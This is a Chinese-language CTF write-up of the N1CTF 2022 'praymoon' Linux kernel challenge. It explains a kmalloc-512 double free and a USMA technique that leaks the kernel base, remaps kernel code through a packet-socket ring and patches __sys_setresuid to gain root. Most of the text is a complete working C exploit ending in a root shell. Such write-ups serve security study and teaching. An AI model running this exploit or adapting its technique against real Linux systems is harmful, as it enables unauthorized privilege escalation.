N1CTF 2022 praymoon

漏洞分析

题目附件:praymoon.zip

系统版本:Linux 5.18.10,开启了KASLR、SMEP、SMAP、KPTI等防护措施。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ cat run.sh 
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram console=ttyS0 oops=panic panic=1 quiet kaslr" \
-cpu kvm64,+smep,+smap\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-no-reboot

/ $ uname -a
Linux (none) 5.18.10 #7 SMP PREEMPT_DYNAMIC Tue Nov 1 19:07:02 UTC 2022 x86_64 GNU/Linux
/ $ cat /sys/devices/system/cpu/vulnerabilities/*
Processor vulnerable
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Not affected
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Retpolines, STIBP: disabled, RSB filling
Not affected
Not affected

再看漏洞ko:只有一个ioctl接口,并且代码量不大。add_flag初始值是1,进0x5555分支可以有一次kmalloc的机会,申请的堆大小为0x200(512字节)。del_flag初始值是2,进0x6666分支可以有两次kfree的机会,所以这里是个double free的漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * seven_ioctl - decompiled ioctl handler of the challenge module (excerpt;
 * parts marked "// ..." are elided in this listing).
 *
 * cmd 0x5555: while add_flag is positive, decrement it and store a fresh
 *             512-byte allocation in the global `moon`.
 * cmd 0x6666: while `moon` is non-NULL and del_flag is positive, decrement
 *             del_flag and kfree(moon). The lines shown do not reset `moon`
 *             afterwards, so the same pointer can be freed again.
 *
 * Both branches shown return 0.
 */
__int64 __fastcall seven_ioctl(file *filp, unsigned int cmd, unsigned __int64 arg)
{
__int64 v4; // rdi

if ( cmd == 0x5555 )
{
if ( add_flag <= 0 )
return 0LL;
// presumably the kmalloc-512 cache (index 9 == 2^9) -- confirm against the binary
v4 = kmalloc_caches[9];
--add_flag;
// 3520 == 0xDC0 is the gfp mask, 512 the object size
moon = (char *)kmem_cache_alloc_trace(v4, 3520LL, 512LL);
printk(&unk_1F2, 3520LL);
return 0LL;
}
else if ( cmd == 0x6666 )
{
if ( moon )
{
if ( del_flag <= 0 )
return 0LL;
--del_flag;
// `moon` keeps its value after this call in the code shown
kfree(moon, cmd, arg);
printk(&unk_202, cmd);
return 0LL;
}
// ...
}
// ...
}

因此,漏洞点非常明显,一个0x200(kmalloc-512)大小的double free,出题人并无意在此为难我们。题目给出如下编译选项:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SHUFFLE_PAGE_ALLOCATOR=y

CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""

CONFIG_MEMCG=y
CONFIG_MEMCG_SWAP=y
CONFIG_MEMCG_KMEM=y

CONFIG_DEBUG_LIST=y

CONFIG_HARDENED_USERCOPY=y

漏洞利用 - USMA

常用的几个内核结构体大小都不是0x200,目前已知的非固定大小结构体有msg_msg和user_key_payload。

msg_msg的申请带了GFP_KERNEL_ACCOUNT标志(在开启CONFIG_MEMCG_KMEM的情况下,这类对象会从独立的kmalloc-cg-*缓存中分配),而漏洞ko在申请内存时未使用该标志,因此它们的堆是隔离开的,无法构成利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// Allocates memory for msg_msg plus the user data (decompiled excerpt).
// The gfp argument 0x400CC0 differs from the 0xCC0 / 0xDC0 masks used by the
// other allocation sites in this listing.
__int64 __fastcall load_msg(__int64 a1, unsigned __int64 a2)
{
// ...
v5 = _kmalloc(v3 + 0x30, 0x400CC0LL);
// ...
}

// Allocation performed by the vulnerable module (decompiled excerpt):
// a 0x200-byte object requested with gfp mask 0xDC0.
__int64 __fastcall seven_ioctl(file *filp, unsigned int cmd, unsigned __int64 arg)
{
// ...
moon = (char *)kmem_cache_alloc_trace(v4, 0xDC0LL, 0x200LL);
// ...
}

// add_key syscall entry (decompiled excerpt): allocates v1 bytes with gfp
// mask 0xCC0 via kvmalloc_node(); presumably the temporary copy of the
// user-supplied payload -- confirm against the kernel source.
__int64 __fastcall _x64_sys_add_key(_QWORD *a1)
{
// ...
v14 = kvmalloc_node(v1, 0xCC0, -1);
// ...
}
// Allocates memory for user_key_payload plus the user data (decompiled
// excerpt): payload length v1 plus a 0x18-byte header, gfp mask 0xCC0.
__int64 __fastcall user_preparse(_QWORD *a1)
{
// ...
v2 = _kmalloc(v1 + 0x18, 0xCC0LL);
// ...
}

user_key_payload中有datalen长度信息,利用double free(UAF)漏洞结合userfaultfd+setxattr可以改掉datalen,于是通过keyctl操作可以越界读取堆上的内容,泄露内核地址。

后续的提权使用USMA。

利用思路简化成下图步骤:

IMG_0415.png

  1. ko malloc
  2. ko free
  3. add_key malloc:user_key_payload占住堆块
  4. ko free
  5. setxattr malloc:改掉user_key_payload的datalen,结合userfaultfd,延迟释放
  6. keyctl read:越界读取堆上的内容,泄露内核基址
  7. keyctl revoke:释放user_key_payload占用的堆块
  8. packet socket:alloc_pg_vec()中kcalloc时占住堆块(USMA)
  9. setxattr free:延迟的释放
  10. setxattr malloc:第一次申请的不一定是目标堆块,因此结合userfaultfd多做几次申请(USMA)
  11. 通过mmap,改内核代码段逻辑,如__sys_setresuid,让普通用户可以通过setresuid(0, 0, 0);获得root权限。(USMA)

完整exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
// gcc usma-leak-exp.c -lpthread -static -o exp
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <linux/keyctl.h>

int fd_seven;
char* addr;
char* aaa;
uint64_t kernel_base = 0;

uint64_t timer_expire_func = 0xffffffff81abd380;
uint64_t crypto_larval_destroy = 0xFFFFFFFF8143E280;

#define BZIMAGE_ADDR 0xFFFFFFFF81000000

#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

/*
 * Logging helpers. Each writes one line to file descriptor 2, prefixed with
 * a severity tag and the source file/line of the call site; logi/logw/loge
 * additionally wrap the line in the colour escape defined above.
 */
#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
/* die: log the formatted message and the exit line via loge, then exit(1). */
#define die(fmt, ...) \
do { \
loge(fmt, ##__VA_ARGS__); \
loge("Exit at line %d", __LINE__); \
exit(1); \
} while (0)


#ifndef PAGE_SIZE
#define PAGE_SIZE (0x1000)
#endif

#ifndef HEXDUMP_COLS
#define HEXDUMP_COLS 16
#endif

/*
 * hexdump - print a buffer to stdout as rows of HEXDUMP_COLS hex bytes
 * followed by the printable-ASCII rendering of the same bytes.
 *
 * @mem: start of the buffer (only dereferenced for indices below @len)
 * @len: number of bytes to dump
 *
 * Output starts and ends with an empty line. The last row is padded so the
 * ASCII column lines up with the full rows above it.
 */
void hexdump(void *mem, unsigned int len) {
    /* unsigned char: <ctype.h> functions are undefined for negative values,
     * which a plain (signed) char yields for bytes >= 0x80. */
    const unsigned char *bytes = mem;
    unsigned int padded_len = len;

    if (len % HEXDUMP_COLS) {
        padded_len += HEXDUMP_COLS - len % HEXDUMP_COLS;
    }

    putchar('\n');
    for (unsigned int i = 0; i < padded_len; i++) {
        /* print offset */
        if (i % HEXDUMP_COLS == 0) {
            printf("0x%06x: ", i);
        }

        /* print hex data, or a blank cell of the same width ("xx ") */
        if (i < len) {
            printf("%02x ", bytes[i]);
        } else {
            printf("   ");
        }

        /* end of row: print the ASCII column */
        if (i % HEXDUMP_COLS == (HEXDUMP_COLS - 1)) {
            for (unsigned int j = i - (HEXDUMP_COLS - 1); j <= i; j++) {
                if (j >= len) {
                    /* past the end of the data: keep the column width */
                    putchar(' ');
                } else if (isprint(bytes[j])) {
                    putchar(bytes[j]);
                } else {
                    putchar('.');
                }
            }
            putchar('\n');
        }
    }
    putchar('\n');
}

/*
 * write_proc_file - best-effort write of a short string to a procfs file.
 * Failures are reported on stderr and otherwise ignored, so the caller
 * carries on exactly as it would have before; the difference is that
 * write()/close() are no longer issued on an invalid descriptor.
 */
static void write_proc_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror(path);
        return;
    }

    size_t len = strlen(text);
    if (write(fd, text, len) != (ssize_t)len) {
        perror(path);
    }
    close(fd);
}

/*
 * init_namespace - move the calling process into new user, mount and network
 * namespaces and map uid/gid 0 inside the user namespace to the caller's
 * original uid/gid.
 *
 * A failing unshare() terminates the process through die(). The three
 * procfs writes (setgroups, uid_map, gid_map) remain best-effort.
 */
void init_namespace(void) {
    char buff[0x100];

    /* Sample the ids before unshare(): they are what the maps refer to. */
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
    }

    if (unshare(CLONE_NEWNET)) {
        die("unshare(CLONE_NEWNET): %m");
    }

    /* setgroups is written before gid_map, in the same order as before. */
    write_proc_file("/proc/self/setgroups", "deny");

    snprintf(buff, sizeof(buff), "0 %u 1", (unsigned int)uid);
    write_proc_file("/proc/self/uid_map", buff);

    snprintf(buff, sizeof(buff), "0 %u 1", (unsigned int)gid);
    write_proc_file("/proc/self/gid_map", buff);
}


#ifndef ETH_P_ALL
#define ETH_P_ALL 0x0003
#endif

/*
 * packet_socket_rx_ring_init - switch packet socket @s to TPACKET_V3 and
 * install an RX ring described by the remaining arguments.
 *
 * tp_frame_nr is derived as (block_size * block_nr) / frame_size.
 * Either setsockopt() failing ends the process through die().
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
        unsigned int frame_size, unsigned int block_nr,
        unsigned int sizeof_priv, unsigned int timeout) {
    int version = TPACKET_V3;

    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    /* Members not listed here are zero-initialised. */
    struct tpacket_req3 ring = {
        .tp_block_size = block_size,
        .tp_block_nr = block_nr,
        .tp_frame_size = frame_size,
        .tp_frame_nr = (block_size * block_nr) / frame_size,
        .tp_retire_blk_tov = timeout,
        .tp_sizeof_priv = sizeof_priv,
        .tp_feature_req_word = 0,
    };

    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

/*
 * packet_socket_setup - create an AF_PACKET raw socket, give it an RX ring
 * with the requested geometry and bind it to the "lo" interface.
 *
 * Returns the socket descriptor. A failing socket() or bind() ends the
 * process through die().
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sock < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(sock, block_size, frame_size, block_nr,
            sizeof_priv, timeout);

    /* Members not listed here (hatype, pkttype, halen, addr) stay zero. */
    struct sockaddr_ll link_addr = {
        .sll_family = PF_PACKET,
        .sll_protocol = htons(ETH_P_ALL),
        .sll_ifindex = if_nametoindex("lo"),
    };

    if (bind(sock, (struct sockaddr *)&link_addr, sizeof(link_addr)) < 0) {
        die("bind(AF_PACKET): %m");
    }

    return sock;
}

/*
 * pagealloc_pad - open a packet socket whose RX ring has @count blocks of
 * @size bytes each (frame size 2048, no private area, timeout 100).
 * Returns the socket descriptor from packet_socket_setup().
 */
int pagealloc_pad(int count, int size) {
    int ring_fd = packet_socket_setup(size, 2048, count, 0, 100);
    return ring_fd;
}


/* ErrExit - print @err_msg and a newline on stdout, then exit with -1. */
void ErrExit(char* err_msg)
{
    printf("%s\n", err_msg);
    exit(-1);
}

/*
 * RegisterUserfault - watch one page with userfaultfd and start a thread
 * that services its faults.
 *
 * @fault_page: start of the page to register (PAGE_SIZE bytes, missing-page
 *              mode)
 * @handler:    thread entry point of type void *(*)(void *); it receives the
 *              userfaultfd descriptor cast to a pointer
 *
 * Any failing step (userfaultfd creation, API handshake, registration,
 * thread creation) ends the process through ErrExit().
 */
void RegisterUserfault(void *fault_page,void *handler)
{
    pthread_t thr;
    struct uffdio_api ua = {0};
    struct uffdio_register ur = {0};

    /* Keep the result signed so a -1 failure can be detected; the syscall
     * may be refused, in which case the ioctls below would hit a bad fd. */
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0)
        ErrExit("[-] userfaultfd");

    ua.api = UFFD_API;
    ua.features = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        ErrExit("[-] ioctl-UFFDIO_API");

    ur.range.start = (unsigned long)fault_page;
    ur.range.len = PAGE_SIZE;
    ur.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
        ErrExit("[-] ioctl-UFFDIO_REGISTER");

    /* The handler thread owns the descriptor from here on. */
    int rc = pthread_create(&thr, NULL, (void *(*)(void *))handler,
                            (void *)(uintptr_t)uffd);
    if (rc != 0)
        ErrExit("[-] pthread_create");
}

/*
 * uffd_delayed_zero_fill - shared body of the two userfaultfd handler
 * threads below.
 *
 * Waits for an event on the userfaultfd passed in @arg, sleeps @delay_secs
 * seconds while the faulting thread stays blocked, then resolves the fault
 * by copying a zero-filled page over the faulting address.
 *
 * Returns NULL. A bad poll()/read() result or a failed mmap() ends the
 * process through ErrExit(); a failed UFFDIO_COPY is reported on stderr.
 */
static void *uffd_delayed_zero_fill(void *arg, unsigned int delay_secs)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    struct pollfd pollfd;
    int nready;

    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    printf("[+] in usefaultfd handler, i will sleep %us\n", delay_secs);
    /* The delay comes before any validation, as in the original handlers. */
    sleep(delay_secs);
    printf("[+] sleep done\n");
    if (nready != 1) ErrExit("[-] Wrong poll return val");

    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0) ErrExit("[-] msg err");

    /* Staging page whose (zero) contents are installed at the fault address. */
    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) ErrExit("[-] mmap err");
    memset(page, 0, PAGE_SIZE);

    struct uffdio_copy uc;
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &uc) == -1) {
        /* Without this the faulting thread would hang with no diagnostic. */
        perror("[-] ioctl-UFFDIO_COPY");
    }

    /* The staging page is no longer needed once the copy was attempted. */
    munmap(page, PAGE_SIZE);
    return NULL;
}

/* Fault handler thread: resolve the fault after a 20 second delay. */
void* userfaultfd_sleep20_handler(void* arg)
{
    return uffd_delayed_zero_fill(arg, 20);
}

/* Fault handler thread: resolve the fault after a 3 second delay. */
void* userfaultfd_sleep3_handler(void* arg)
{
    return uffd_delayed_zero_fill(arg, 3);
}

/* seven_kmalloc - issue ioctl 0x5555 (the module's allocation command) on fd_seven. */
void seven_kmalloc(){
    const unsigned long cmd_alloc = 0x5555;

    ioctl(fd_seven, cmd_alloc, 0);
}

/* seven_kfree - issue ioctl 0x6666 (the module's free command) on fd_seven. */
void seven_kfree(){
    const unsigned long cmd_free = 0x6666;

    ioctl(fd_seven, cmd_free, 0);
}

/*
 * setxattr_thread - thread entry point: call setxattr() on "/exp" with
 * attribute name "bling", a 0x200-byte value starting at @addr_arg and
 * flags 0. The result of setxattr() is ignored. Always returns NULL.
 */
void* setxattr_thread(void* addr_arg){
    const size_t value_len = 0x200;

    setxattr("/exp", "bling", addr_arg, value_len, 0);
    return NULL;
}


/*
 * key_alloc - add a key of type "user" to the process keyring.
 *
 * @description: key description string
 * @payload:     payload bytes
 * @payload_len: number of payload bytes
 *
 * Returns the raw add_key syscall result narrowed to int.
 */
int key_alloc(char* description, char* payload, int payload_len)
{
    long rc = syscall(__NR_add_key, "user", description, payload,
                      payload_len, KEY_SPEC_PROCESS_KEYRING);

    return rc;
}

/*
 * key_read - read the payload of key @key_id into @retbuf (capacity
 * @retbuf_len) via keyctl(KEYCTL_READ).
 *
 * Returns the raw keyctl syscall result narrowed to int.
 */
int key_read(int key_id, char *retbuf, int retbuf_len)
{
    long rc = syscall(__NR_keyctl, KEYCTL_READ, key_id, retbuf, retbuf_len);

    return rc;
}

/*
 * key_revoke - revoke key @key_id via keyctl(KEYCTL_REVOKE); the three
 * remaining syscall arguments are passed as 0.
 *
 * Returns the raw keyctl syscall result narrowed to int.
 */
int key_revoke(int key_id)
{
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, key_id, 0, 0, 0);

    return rc;
}


/*
 * main - fork into two roles.
 *
 * Child (fork() == 0): enters new namespaces, opens /dev/seven and runs the
 * allocation/free sequence listed in the inline comments, then blocks in
 * pause().
 *
 * Parent: sleeps 8 seconds, calls setresuid(0, 0, 0), prints the resulting
 * uid/euid, tries to read /flag and starts /bin/sh.
 *
 * The sleep() calls are the only synchronisation between the threads and
 * processes involved, so statement order and delays matter.
 */
int main(){
int packet_fds = 0;
int packet_fds1 = 0;
int i = 0;

pid_t pid = fork();
if(!pid){
init_namespace();
fd_seven = open("/dev/seven",2);

// Two 2-page mappings; in each, the second page is registered with
// userfaultfd so that a copy crossing into it blocks until the handler
// thread resolves the fault (after 20 s for `addr`, 3 s for `aaa`).
addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
RegisterUserfault(addr+0x1000, userfaultfd_sleep20_handler);

aaa = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
RegisterUserfault(aaa+0x1000, userfaultfd_sleep3_handler);
// Fill the last 0x150 bytes of the first page of `aaa` with the value 'd'.
for(int k = 0x150; k > 0x0; k = k-0x8){
*(uint64_t*)(aaa+0x1000-k) = 'd';
}
// Overwrite the first three qwords of that region. The third (offset 0x10)
// is presumably what lands on user_key_payload's datalen -- the struct
// layout is not shown in this file, confirm against the kernel headers.
*(uint64_t*)(aaa+0x1000-0x150) = 0x11111111;
*(uint64_t*)(aaa+0x1000-0x148) = 0x22222222;
*(uint64_t*)(aaa+0x1000-0x140) = 0x1000;

// malloc + free
seven_kmalloc();
seven_kfree();
// malloc: user_key_payload
char* in_buf = malloc(0x100);
memset(in_buf,'a',0x100);
int fd_key = key_alloc("description1",in_buf,0xF0);
// free
seven_kfree();
// malloc: setxattr
// The 0x200-byte value starts 0x150 bytes before the userfaultfd page, so
// the copy stalls in the sleep3 handler partway through.
pthread_t thr1;
pthread_create(&thr1, NULL, setxattr_thread, aaa+0x1000-0x150); // kmalloc -> sleep(3) -> kfree
sleep(1);

// leak
char *retbuf1 = malloc(0x1000);
memset(retbuf1, 0, 0x1000);
int qqq = key_read(fd_key,retbuf1,0x1000);
printf("[+]qqq: %d\n",qqq);
// hexdump(retbuf1,0x1000);

// Scan the 0x1000 returned bytes as qwords for a value whose upper 32 bits
// are all ones and whose low 12 bits are 0x280 (the low 12 bits of
// crypto_larval_destroy), and derive kernel_base from the first match.
for(i = 0;i < 0x200; i++){
uint64_t temp_value = *(uint64_t*)(retbuf1+i*8);
if(((temp_value>>32) == 0xffffffff) && ((temp_value & 0xfff) == 0x280)){
kernel_base = temp_value - (crypto_larval_destroy - BZIMAGE_ADDR);
printf("[+] kernel_base is: 0x%lx\n",kernel_base);
break;
}
}

// i == 0x200 means the loop ran to completion without a match.
if(i == 0x200){
printf("failed leak, reboot and try again!\n");
exit(0);
}

// free: user_key_payload
key_revoke(fd_key);
sleep(1);

// malloc: AF_PACKET
// RX ring with 33 blocks of 0x1000 bytes each.
packet_fds = pagealloc_pad(33, 0x1000);
printf("page alloc done!\n");

// free, malloc, control
sleep(1); // waiting pthread's kfree
// Fill the last 0x150 bytes of the first page of `addr` with one address:
// the fixed value 0xFFFFFFFF81086000 rebased onto the leaked kernel_base.
for(int j = 0x150; j > 0x0; j = j-0x8){
// *(uint64_t*)(addr+0x1000-j) = 0xFFFFFFFF81078000 - BZIMAGE_ADDR + kernel_base;
*(uint64_t*)(addr+0x1000-j) = 0xFFFFFFFF81086000 - BZIMAGE_ADDR + kernel_base;
}
// *(uint64_t*)(addr+0x1000-0x150) = 0xFFFFFFFF81078000 - BZIMAGE_ADDR + kernel_base;
*(uint64_t*)(addr+0x1000-0x150) = 0xFFFFFFFF81086000 - BZIMAGE_ADDR + kernel_base;

// Two setxattr threads on the `addr` buffer, one second apart; each stalls
// in the sleep20 handler's page.
pthread_t thr_sleep,thr_sleep2;
pthread_create(&thr_sleep, NULL, setxattr_thread, addr+0x1000-0x150);
sleep(1);
pthread_create(&thr_sleep2, NULL, setxattr_thread, addr+0x1000-0x150);
sleep(1);

// Map all 33 ring blocks of the packet socket into this process.
char *page = (char *)mmap(NULL, PAGE_SIZE * 33,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
printf("mmap done\n");
// hexdump(page, 0x1000);

// page[0x997] = 0x7;
page[0xfd8] = 0xeb; // change if branch

// Stay alive so the mappings and threads above persist.
pause();
}else{
// Parent: wait for the child's sequence to finish, then try to become root.
sleep(8);
char buf[50]= {0};
printf("new\n");
setresuid(0, 0, 0);
printf("getuid: %d\n",getuid());
printf("geteuid: %d\n",geteuid());
int fd1 = open("/flag",0);
printf("fd:%d\n",fd1);
read(fd1,buf,0x20);
printf("flag:%s\n",buf);
system("/bin/sh");
// execl("/bin/sh", "sh", NULL);
}

pause();
return 0;
}

有几个需要注意的点:

  • 部分socket操作不允许普通用户执行,因此由子进程调用init_namespace()切换命名空间,然后执行利用逻辑。而父进程等待子进程操作完成后,提权获得root shell即可。
  • 由于利用过程中对目标0x200堆块有多次malloc和free操作,要保证0x200堆块链不被破坏,后续才能稳定get shell。

关于USMA

USMA用到了三个系统调用:

  • setsockopt
  • mmap
  • setresuid

前两个搭配可以更改内核任意代码段逻辑。

以setresuid为例,改掉__sys_setresuid()中if判断(或者改ns_capable_setid()的返回值,固定成1),使任意用户可以通过setresuid(0,0,0)将自己的uid改成0,即获得root权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * __sys_setresuid - kernel implementation of setresuid() (excerpt; elided
 * parts are marked "// ...").
 *
 * The block shown only runs when ns_capable_setid() reports that the caller
 * lacks CAP_SETUID in its user namespace. In that case each requested id
 * that is not -1 must equal one of the caller's current uid, euid or suid;
 * otherwise control jumps to the error label.
 */
long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
{
// ...
if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
if (ruid != (uid_t) -1 && !uid_eq(kruid, old->uid) &&
!uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
goto error;
if (euid != (uid_t) -1 && !uid_eq(keuid, old->uid) &&
!uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
goto error;
if (suid != (uid_t) -1 && !uid_eq(ksuid, old->uid) &&
!uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
goto error;
}
// ...
}

调用梳理

packet_setsockopt:

entry_SYSCALL_64_after_hwframe() -> do_syscall_64() -> __x64_sys_setsockopt() -> __sys_setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec() -> 申请n个struct pgv结构体

1
2
3
/* One ring-block descriptor: a single pointer to the block's buffer. */
struct pgv {
char *buffer;
};

packet_mmap:

entry_SYSCALL_64_after_hwframe() -> do_syscall_64() -> __x64_sys_mmap() -> ksys_mmap_pgoff() -> vm_mmap_pgoff() -> do_mmap() -> mmap_region() -> call_mmap() -> sock_mmap() -> packet_mmap() -> vm_insert_page() -> validate_page_before_insert() -> 将pgv中虚拟地址对应的物理页映射到用户态

操作梳理

packet_setsockopt()最终调用alloc_pg_vec()申请一段内核堆空间,大小是用户态可控的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * alloc_pg_vec - allocate the pgv array for a packet ring and one buffer per
 * block (kernel excerpt; elided parts are marked "// ...").
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
// ...
// Allocate block_nr * sizeof(struct pgv) bytes (8 per entry); block_nr is
// supplied by user space.
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
// ...

for (i = 0; i < block_nr; i++) {
// Request block_nr blocks of block_size bytes (chosen by user space) from
// the buddy allocator, one per array entry.
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}
// ...
}

用户态mmap的时候,可以一次性将block_nr个block全部mmap到用户空间,如PAGE_SIZE * KMALLOC64_PAGE_CNT

1
2
// Map KMALLOC64_PAGE_CNT pages of the packet socket's ring in one mmap() call.
char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);

用户态mmap在该环境下最终对应到内核packet_mmap()函数,将pg_vec中的虚拟地址全部重新映射给用户态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
 * packet_mmap - mmap handler of a packet socket (kernel excerpt; elided
 * parts are marked "// ...").
 *
 * Requires the VMA size to equal expected_size, then walks the rx and tx
 * rings and inserts every page of every block into the VMA in order.
 */
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
// ...
size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

// rb->pg_vec_len is the block_nr passed in through setsockopt()
for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
// Fetch this block's virtual address from the array that
// alloc_pg_vec() allocated
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

// rb->pg_vec_pages is block_size / PAGE_SIZE from the setsockopt() request
for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
// Translate the virtual address into its physical page
page = pgv_to_page(kaddr);
// Map that physical page into the user address space
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}
// ...
}

参考资料

USMA:用户态映射攻击

基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践

kernel-exploit-factory/CVE-2022-27666/exploit/

